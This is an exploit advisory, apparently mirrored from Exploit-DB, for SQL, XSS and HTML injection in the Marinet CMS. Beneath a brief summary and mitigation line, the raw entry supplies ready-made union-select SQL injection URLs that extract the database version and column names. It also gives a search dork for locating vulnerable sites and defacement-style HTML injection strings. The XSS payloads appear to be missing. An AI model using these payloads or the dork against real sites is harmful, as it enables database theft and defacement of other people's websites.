Marinet cms SQL/XSS/HTML Injection Vulnerability

vendor:

Marinet cms

by:

CoBRa_21

8,8

CVSS

HIGH

SQL/XSS/HTML Injection

89, 79, 80

CWE

Product Name: Marinet cms

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Marinet cms SQL/XSS/HTML Injection Vulnerability

Marinet cms is vulnerable to SQL/XSS/HTML Injection. An attacker can inject malicious SQL/XSS/HTML code in the vulnerable parameters of the Marinet cms application. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code, to disclose sensitive information from the database, to execute arbitrary HTML code, to bypass authentication and authorization mechanisms, to perform unauthorized actions, etc.

Mitigation:

Input validation, parameterized queries, and proper output encoding should be used to prevent SQL/XSS/HTML Injection.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------------
 
Marinet cms SQL/XSS/HTML Injection Vulnerability
 
-------------------------------------------------------------------------------------------
 
Author: CoBRa_21
 
Mail: uyku_cu@windowslive.com
 
Script Home: http://www.marinet.gr/
 
Dork: Powered by Marinet

-------------------------------------------------------------------------------------------
 
Sql Injection:
 
http://localhost/[path]/product.php?id=-1%20union%20select%200,1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,group_concat%28column_name%29,23,24,25,26%20from%20information_schema.columns%20where%20table_name=char%28118,%20105,%20115,%2097,%2095,%20116,%2097,%2098,%20108,%20101%29

http://localhost/[path]/productuk.php?id=-1%20union%20select%200,1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,group_concat%28column_name%29,24,25,26%20from%20information_schema.columns%20where%20table_name=char%28118,%20105,%20115,%2097,%2095,%20116,%2097,%2098,%20108,%20101%29
 
-------------------------------------------------------------------------------------------

XSS Injection

http://localhost/[path]/search.php
Search Box Paste Code: 


http://localhost/[path]/info.php?catid=1&cat=
http://localhost/[path]/galleryphoto.php?id=1&photo=

-------------------------------------------------------------------------------------------

HTML Injection

http://localhost/[path]/search.php
Search Box Paste Code: <font size=15 color=red>Hacked By CoBRa_21</font>


http://localhost/[path]/galleryphoto.php?id=1&photo=<font size=15 color=red>Hacked By CoBRa_21</font>
http://localhost/[path]/info.php?catid=1&cat=<font size=15 color=red>Hacked By CoBRa_21</font>